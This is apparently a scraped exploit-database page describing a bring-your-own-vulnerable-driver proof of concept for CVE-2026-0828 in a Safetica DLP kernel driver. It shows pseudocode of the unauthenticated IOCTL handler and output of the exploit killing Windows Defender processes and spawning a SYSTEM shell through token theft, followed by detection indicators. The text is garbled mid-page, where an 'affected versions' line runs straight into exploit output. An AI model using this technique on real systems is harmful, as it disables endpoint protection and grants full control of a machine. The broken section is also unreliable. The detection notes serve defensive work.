## https://sploitus.com/exploit?id=E3113D7A-18FE-59ED-8FB1-D4B7442516BB
# CVE-2026-0828 โ Safetica ProcessMonitorDriver.sys BYOVD PoC
Safetica DLP kernel driver (`ProcessMonitorDriver.sys`) exposes an unauthenticated IOCTL that allows any user-mode caller to terminate arbitrary processes via `ZwTerminateProcess` in kernel context, bypassing PPL (Protected Process Light) protection.
**CVSS:** 8.8 (High) ยท **Type:** BYOVD, LPE ยท **Platform:** Windows x64
---
## Vulnerability
The `IRP_MJ_DEVICE_CONTROL` handler for IOCTL `0xB822200C` calls `ZwOpenProcess` with `PROCESS_ALL_ACCESS (0x1FFFFF)` and subsequently `ZwTerminateProcess` using a PID supplied directly from the input buffer โ **without any privilege or caller validation.**
```c
// Vulnerable handler (IDA pseudocode)
ClientId.UniqueProcess = **(HANDLE **)(irp->AssociatedIrp.SystemBuffer);
ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
ZwTerminateProcess(ProcessHandle, 0); // no SeSinglePrivilegeCheck, no ExGetPreviousMode check
```
Because the call originates in kernel context, PPL-protected processes (Windows Defender, EDR agents) can be terminated.
**Affected versions:** Safetica KILLED
NisSrv.exe PID 4180 -> KILLED
SeDebugPrivilege enabled
winlogon.exe -> pid 560
[+] Got SYSTEM token handle.
[+] Token duplicated.
shell spawned
```
A new `cmd.exe` window opens as `NT AUTHORITY\SYSTEM`.
---
## Detection
**Event ID 7045** โ new kernel service installation:
```
Service Name: STProcessMonitor
Service File Name: ...\ProcessMonitorDriver.sys
Service Type: kernel mode driver
```
**WDAC blocklist (SHA256):**
```
70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b
```
**ETW:** Monitor `DeviceIoControl` calls to `\\.\STProcessMonitorDriver`.
---
## Tested On
- Windows 10 22H2 x64
---
> **For authorized security research and lab use only. Do not use against systems you do not own or have written permission to test.**